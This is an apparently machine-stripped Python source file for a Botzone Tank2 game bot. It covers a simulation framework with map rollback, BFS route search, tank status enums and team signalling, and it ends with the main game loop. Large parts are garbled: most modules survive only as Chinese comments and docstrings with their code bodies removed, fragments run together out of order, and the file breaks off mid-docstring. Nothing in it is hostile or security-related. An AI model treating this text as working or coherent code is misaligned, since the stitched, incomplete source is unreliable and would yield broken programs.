被去掉 self._mySide = header["mySide"] assert self._mySide in (0, 1), "unexpected mySide %s" % self._mySide for key, _Field in [("brickfield", BrickField), ("steelfield", SteelField), ("waterfield", WaterField),]: for x, y in self._parse_field_points(header[key]): self._map.insert_field(_Field(x, y)) if self._mySide == 0: allBlueActions = self._responses allRedActions = self._requests elif self._mySide == 1: allBlueActions = self._requests allRedActions = self._responses for blueActions, redActions in zip(allBlueActions, allRedActions): self._map.perform(blueActions, redActions) if not len(allBlueActions) == 0 and not len(allRedActions) == 0: b0, b1 = zip(*allBlueActions) r0, r1 = zip(*allRedActions) self._pastActions = { # { (side, id): [Action] } (0, 0): b0, (0, 1): b1, (1, 0): r0, (1, 1): r1, 
} def make_output(self, actions, stream=sys.stdout, debug=None, data=None, globaldata=None): if data is not None: data = DataSerializer.serialize(data) if globaldata is not None: globaldata = DataSerializer.serialize(globaldata) super().make_output(stream, actions, debug, data, globaldata) def get_past_actions(self, side, id): """ 获得某一坦克的历史决策 """ return self._pastActions.get( (side, id), [] ) # 没有记录则抛出 [] #{ END 'botzone.py' }# #{ BEGIN 'main.py' }# def main(istream=None, ostream=None): map_ = Tank2Map(MAP_WIDTH, MAP_HEIGHT) # Singleton terminal = Tank2Botzone(map_, long_running=LONG_RUNNING_MODE) # Singleton istream = istream or BotzoneIstream() ostream = ostream or BotzoneOstream() while True: t1 = time.time() if LONG_RUNNING_MODE: # 这个模式下 map 对象会复用,首先需要重置 map_.reset() terminal.handle_input(stream=istream) if SIMULATOR_ENV: map_.debug_print_out() if terminal.data is not None: memory = terminal.data["memory"] else: memory = { BLUE_SIDE: None, RED_SIDE: None, } side = terminal.mySide tanks = map_.tanks bluePlayer0 = Tank2Player(tanks[BLUE_SIDE][0], map_) bluePlayer1 = Tank2Player(tanks[BLUE_SIDE][1], map_) redPlayer0 = Tank2Player(tanks[RED_SIDE][0], map_) redPlayer1 = Tank2Player(tanks[RED_SIDE][1], map_) bluePlayers = [bluePlayer0, bluePlayer1] redPlayers = [redPlayer0, redPlayer1] bluePlayer0.set_teammate(bluePlayer1) bluePlayer1.set_teammate(bluePlayer0) redPlayer0.set_teammate(redPlayer1) redPlayer1.set_teammate(redPlayer0) bluePlayer0.set_opponents(redPlayers) bluePlayer1.set_opponents(redPlayers) redPlayer0.set_opponents(bluePlayers) redPlayer1.set_opponents(bluePlayers) blueTeam = Tank2Team(BLUE_SIDE, bluePlayer0, bluePlayer1, map_) redTeam = Tank2Team(RED_SIDE, redPlayer0, redPlayer1, map_) blueTeam.set_opponent_team(redTeam) redTeam.set_opponent_team(blueTeam) blueTeam.load_memory(memory[BLUE_SIDE]) redTeam.load_memory(memory[RED_SIDE]) blueTeam.set_previous_actions([ terminal.get_past_actions(BLUE_SIDE, bluePlayer0.id), 
terminal.get_past_actions(BLUE_SIDE, bluePlayer1.id), ]) redTeam.set_previous_actions([ terminal.get_past_actions(RED_SIDE, redPlayer0.id), terminal.get_past_actions(RED_SIDE, redPlayer1.id), ]) if side == BLUE_SIDE: myPlayer0 = bluePlayer0 myPlayer1 = bluePlayer1 myPlayers = bluePlayers myTeam = blueTeam oppPlayers = redPlayers oppTeam = redTeam elif side == RED_SIDE: myPlayer0 = redPlayer0 myPlayer1 = redPlayer1 myPlayers = redPlayers myTeam = redTeam oppPlayers = bluePlayers oppTeam = blueTeam else: raise Exception("unexpected side %s" % side) actions = myTeam.make_decision() if SIMULATOR_ENV: allStatus = [ player.get_status().copy() for player in myPlayers ] allLabels = [ player.get_labels().copy() for player in myPlayers ] if SIMULATOR_ENV: oppActions = oppTeam.make_decision() oppAllStatus = [ player.get_status().copy() for player in oppPlayers ] oppAllLabels = [ player.get_labels().copy() for player in oppPlayers ] if SIMULATOR_ENV: _CUT_OFF_RULE = "-" * 20 _SIDE_NAMES = ["Blue", "Red"] simulator_print("Decisions for next turn:") simulator_print(_CUT_OFF_RULE) def _print_decision(actions, side, allStatus, allLabels): for id_, action in enumerate(actions): _output = "%-4s %02d: %-11s [status] %s" % ( _SIDE_NAMES[side], id_+1, Action.get_name(action), ", ".join( Status.get_name(status) for status in allStatus[id_] ), ) if allLabels[id_]: _output += " [label] %s" % ( ", ".join( Label.get_name(label) for label in allLabels[id_] ) ) simulator_print(_output) _print_decision(actions, side, allStatus, allLabels) _print_decision(oppActions, 1-side, oppAllStatus, oppAllLabels) simulator_print(_CUT_OFF_RULE) simulator_print("Actually actions on this turn:") simulator_print(_CUT_OFF_RULE) for side, tanks in enumerate(map_.tanks): for id_, tank in enumerate(tanks): simulator_print("%s %02d: %s" % (_SIDE_NAMES[side], id_+1, Action.get_name(tank.previousAction))) simulator_print(_CUT_OFF_RULE) t2 = time.time() data = { "memory": [ blueTeam.dump_memory(), 
redTeam.dump_memory() ], } debugInfo = { "time": round(t2-t1, 4), "storage": sys.getsizeof(DataSerializer.serialize(data)) } terminal.make_output(actions, stream=ostream, debug=debugInfo, data=data) if __name__ == '__main__': main() #{ END 'main.py' }#
zh
0.898004
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# #-------------# # Game Config # #-------------# #-------------# # Game Status # #-------------# #{ END 'const.py' }# #{ BEGIN 'global_.py' }# #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 from werkzeug._internal from werkzeug.utils 清除缓存 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 
如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 # kwargs 自动排序 # 如果返回结果是生成器,那么马上获得所有结果 Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 # 默认为 0 #{ END 'utils.py' }# #{ BEGIN 'action.py' }# # 空与无效 # 额外添加的 # 停止 # 移动 # 射击 # 根据 action 的值判断移动方向和射击方向 # 方便用于迭代 # 是否为有效行为 # 是否为停止行为 # 是否为移动行为 # 是否为射击行为 两个行动方向是否相对 两个行动方向是否相同 获得 (x1, y1) -> (x2, y2) 的 move 行为值 可以不相邻! # STAY 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... 获得 (x1, y1) -> (x2, y2) 的射击行为 #{ END 'action.py' }# #{ BEGIN 'field.py' }# #-----------------------# # rule: BASE + 1 + side # #-----------------------# # side = -1 # side = 0 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# # side = -1 # side = 0 # side = 1 # const #{ END 'field.py' }# #{ BEGIN 'map_.py' }# 判断 (x, y) 坐标是否位于地图内 获得 xy: (x, y) 的内容 一个用于回滚计数的内部类 # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 # turn -> [[int, int], [int, int]] 记录 perform 所执行过的动作,用于 undo_revert # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 # 重置整个地图 # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") # 不再使用缓存啦 # 当前回合数 #@CachedProperty # 缓存效果不明显 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 #@CachedProperty # 缓存效果不明显 初始化基地和基地前的钢墙 # x-center # side 1 蓝方 # side 2 红方 初始化坦克 # side 1 蓝方 左 0 右 1 # side 2 红方 左 1 右 0 # 记录被清楚的对象 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T # 重合视为一个坦克 # 遵循 Field 中常数定义的算法 判断某坐标点是否有多辆坦克堆叠 判断是否为合法的移动行为 #assert Action.is_move(action), "action %s is 
not a move-action" % action # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 # 遇到坦克不能移动! 判断是否为合法的设计行为 # assert Action.is_shoot(action), "action %s is not a shoot-action" % action # 只要不连续两回合射击都合理 判断是否为合法行为 # 未知的行为 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, int] 红方 0, 1 号坦克将执行的动作 #debug_print("Start Turn: %s" % self._turn) #self.debug_print_out("") # 使用 set 避免重复 # 记录老的 previous actions # 记录 # 检查 actions 合理性,修改 tank 缓存 # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 # 处理射击行为 # 使之与 dx, dy 的 idx 对应 # 必定都是 tank # len(currentFields) == 1 # 跳过水路和空格 # 对射判断,此时两方所在格子均都只有一架坦克 # 对射抵消 # 坦克被摧毁 # 钢墙无法摧毁 # 基地和土墙可以被摧毁 # 摧毁了第一个遇到的 fields #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 回滚一回合的行为 Return: - success bool # 可以为 1 ,此时回滚到 Turn 0 的结束点 # 这表示回到地图最初的状态 # 回滚历史动作 # tank 发生移动 #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 simulate 的 with 版用法,结束后会自动回滚 #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) multi_simulate 的 with 用法 回滚到先前回合 回滚结束后,会自动撤销回滚 # 回合结束后撤销回滚 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 # 每成功调用一次 map_.simulate 就需要调用一次 increase 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 # 每成功调用一次 map_.revert 就需要调用一次 increase 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 # 0 蓝方 1 红方 # 坦克全部被消灭 # 基地被摧毁 [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 #{ END 'map_.py' }# 
#{ BEGIN 'tank.py' }# # { (side, id): instance } 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 #self.__attackingRoute = None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 # singleton ! # 本回合是否可以射击 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 # 默认不包含中线 是否处于敌方半边的地图 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 是否处于地方半边的地图 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 获得周围可以移动到达的空位 所有合法的移动行为 获得所有合法的射击行为 获得所有合法的行为 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] # 优先边路搜索 # 队友有可能会变成阻碍! 5cdde41fd2337e01c79f1284 # 不将敌方坦克加入到其中 # 初始化 minLength # 否则就是 [ Route() ] 表示没有找到路径 获得默认的最短攻击路径 # 直接返回第一个 route 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 # 没有找到路线,这种情况不可能 # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 # 跳过 start # move-action ## 优先移动 ## # 但是,如果正前方就是基地,则不移动,只射击 # 钢墙不可以射穿 # 土墙认为可以射掉 # 坦克也认为可以射掉 # 队友坦克不进攻 # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 # 这个时候如果能够射击,就优先射击 # 其他情况仍然优先移动 ## 遇到墙/敌方基地/坦克,不能移动 # 尝试射击 # 仅需要防止射到队友 # 不能射击,只好等待 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] # 默认用所有最短的进攻路线 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes # 初始化 minLength # 否则就是 [ Route() ] 表示没有找到路径 获取默认的最短路线 # 直接返回第一个 获得下一个防御动作,不考虑周围敌人 # 跳过 start # move-action ## 优先移动 ## ## 遇到墙/己方基地/坦克,不能移动 # 尝试射击 # 仅需要防止射到队友 # 遇到己方基地 # 否则就是等待了 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 # 正常地图 # 加入地方坦克 # 优先左右拦截 近身条件下,获得到达对方的路劲 # 将己方坦克和重叠坦克视为 block # 优先左右拦截 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s # 优先左右移动 上一个函数的一个简单扩展 下一个追杀敌军的行为 # 没有找到路线,这种情况不可能 # 说明自己和敌方重合,这种情况不应该出现 # 跳过 start # move-action ## 见到敌人就开火,否则移动 # 会被用到两次,因此缓存一下 # 有队友,停止射击 # 否则再判断是否应该射击 # 到此处说明没有敌人,或者有队友 ## 优先移动 ## 遇到路障,射击 # 遇到队友,等待 ## 也不能射击?于是等待 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field 
Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 对上一函数的补充,允许传入 xy 作为变量 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] # 没有对象 # 多辆坦克 # len == 1 # 说明这个方向上没有敌人 # 遇到了敌人 # 遇到了队友 周围是否存在敌军 是否与敌方坦克重合 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 # 在本方地盘,优先朝自己基地的方向闪现 # 在对方地盘,优先朝着对方基地的方向闪现 # 优先逃跑向对方基地 # 逃跑方向不对 # # 应该朝着远离队友的方向闪避? 5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate) #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions) #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! 
#map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 # 不可能闪避 # 可以 # 相反方向,无法闪避,否则可以 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 # 选择性同 try_dodge # 按照惯例,优先凿开移向对方基地的墙 # 方向不对,不能凿开相隔的墙 # 需要判断两边的墙壁是否为不可凿开的对象 # 射击行为一定成功 # 其他都是不适用的 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 返回 self -> oppTank 的射击行为,相当于 move + 4 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 # 坐标上直接可以否掉的情况 # 重叠,这种情况一般不会出现,但是还是判断一下 # 说明处在在多人坦克里 # 否则不算 # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) # 这种情况将 brick 视为空 # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 背向远离地方坦克 # 获得相反方向 如果向 action 对应的方向射击,那么可以摧毁什么东西? ------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 # 没有对象 # 多辆坦克 如果当前回合射击,是否能够摧毁一个墙 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 # 还需要共线 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None # 检查前方是否是墙 # 此时 x2, y2 位置上是一个 Brick # 检查前方是否有敌方坦克 # 除了水路和空地可以继续搜索外,其他情况均直接结束 #, block_teammate=False, isolate=False): 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? 
return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1] # 已经被摧毁的敌人就不考虑了 # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 # TODO: 如何处理本来就找不到路的情况? # 显然必定会大于 0 ! 
假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 # 让敌人根本无路可走 # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# # 无效信号 # 空信号 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 # 团队信号,准备破墙,先给自己寻找后路 # 队员信号,准备好为破墙而凿开两边墙壁 # 团队信号,强制破墙 # 队员信号,准备要破墙 # 团队信号,建议马上打破重叠 # 队员信号,准备要主动打破重叠 # 团队信号,强制行军 # 队员信号,准备强制行军 # 团队信号,需要和队友打破重叠 # 队员信号,准备和队友打破重叠 # 团队信号,建议反向远离墙壁 # 队员信号,准备反向远离墙壁 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# # 空状态 # 侵略性的 # 僵持的 # 防御性的 # 撤退性的 # 准备要挂了 # 已经挂了 # 正在装弹,下回合无法射击 # 遇到敌人 # 遇到一个敌人 # 遇到两个敌人 # 正在和敌人重叠 # 继续行军 # 准备拆基地 # 准备反击 # 准备闪避敌人 # 准备击杀敌人 # 准备堵路 # 等待与自己重叠的敌人的决策 # 存在风险,等待进攻 # 隔墙有人 # 为了防止被射击而停下 # 主动追杀敌军 # 主动防御状态 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 # 正在和敌人对射 # 假装逃跑 # 进攻时预先清除与自己相隔一步的土墙 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 # 准备和队友打破重叠 # 正面敌人基地,或者和敌人基地处在同一直线上 # 准备跟随墙后敌人的移动方向 # 准备后撤 # 已经到达我方基地附近,进入守卫状态 # 已经到达我方基地附近,准备停留等待 # 等待回防,可能是由于敌人阻挡 # 向着另一个 guard point 移动 # 也许会有敌人出现在墙后 # 墙后停止不前时,准备打通中线 # 尝试打破一直回头的状态 # 强制行军,强攻,不考虑某些可能的风险 # 强制撤退,不考虑可能的风险 # 准备为破墙而准备闪避路线 # 准备破墙 # 准备主动打破重叠 # 准备主动强攻 # 防止团队间相互攻击而强制停止 # 准备主动反向远离墙壁 # 合作拆家,并且帮助队友进攻 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 通过状态值自动判定方法 # 应该保证一定有方法? #{ END 'strategy/status.py' }# #{ BEGIN 'strategy/label.py' }# # 会和我同时打破重叠 # 回合我方同时以射击的方式打破重叠 # 当敌人和我方坦克重叠时,对方立即与我打破重叠 # 我方坦克持久化撤退状态 # 强制性要求一个队员不再防御 # 我方坦克总是尝试回头 通过状态值自动判定方法 # 应该保证一定有方法? 
#{ END 'strategy/label.py' }# #{ BEGIN 'strategy/utils.py' }# 伪造一个没有敌方坦克的地图类型矩阵 WARNING: 首先检查是不是对方 tank ,因为可能遇到对方已经死亡或者两方坦克重合 这种时候如果己方坦克恰好在这个位置,就会被删掉,assert 不通过 # 还需要考虑重叠的坦克 伪造一个敌方坦克视为钢墙的地图类型矩阵 用于在堵路时估计对方时候存在绕路的可能 # 还需要考虑重叠的坦克 获得 (x1, y1) -> (x2, y2) 曼哈顿距离 #{ END 'strategy/utils.py' }# #{ BEGIN 'strategy/route.py' }# # 无穷大的权重,相当于不允许到达 # 无穷大的路径长度,相当于找不到路径 # 空行为 # 上回合什么都不做,相当于停止,专门用于 start == end 的情况 # 上一回合操作标记为搜索 # 上一回合操作标记为射击 # 没有相应的坐标 路径节点 ----------------- 搜索得到路径后,用于对路径的节点进行对象化的描述 Property: - x int 坐标 x - y int 坐标 y - xy (int, int) 坐标 (x, y) - weight int 节点权重,相当于走过这个节点需要多少步 - arrivalAction int 通过什么方式到达这个节点的 路径类 ----------------- 用于对搜索得到的路径进行对象化的描述 Property: - nodes [RouteNode] 从 start -> end 的节点链 - length int 路径长度 - start (x, y) 起点坐标 - end (x, y) 终点坐标 Method: - is_not_found - has_block Input: ------------------------------------ - node_chain 节点链的 head ,对应着最后一步到达的节点 其中的节点是符合如下结构的 list def struct Node: [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] # 添加一个 dummy head 用于遍历 添加在原始 node chain head 前的 dummy head ,方便遍历 # 指向路径终点 end 是否是空路径,即没有找到可以到达终点的路径 获得路径长度,相当于节点权重的加和 如果没有找到路线,那么返回 INFINITY_ROUTE_LENGTH 路径起点 如果没有找到路径,那么返回 NONE_POINT 路径终点 如果没有找到路径,那么返回 NONE_POINT 判断一个 block 类型的 field (Brick/Base/Tank) 是否在该路径上 所谓的 block 类型指的是:必须要射击一次才能消灭掉 # 移动受阻 # 射击受阻 #{ END 'strategy/route.py' }# #{ BEGIN 'strategy/search.py' }# # y-axis first / vertical first / aggressive # 上右下左 # 上左下右 # 下右上左 # 下左上右 # x-axis first / horizontal first / defensive # 右上左下 # 左上右下 # 右下左上 # 左下右上 #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 
己方坦克和对方坦克 #------------------------ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 # 如果 x2, y2 为空,则默认以地图中点作为目标 BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 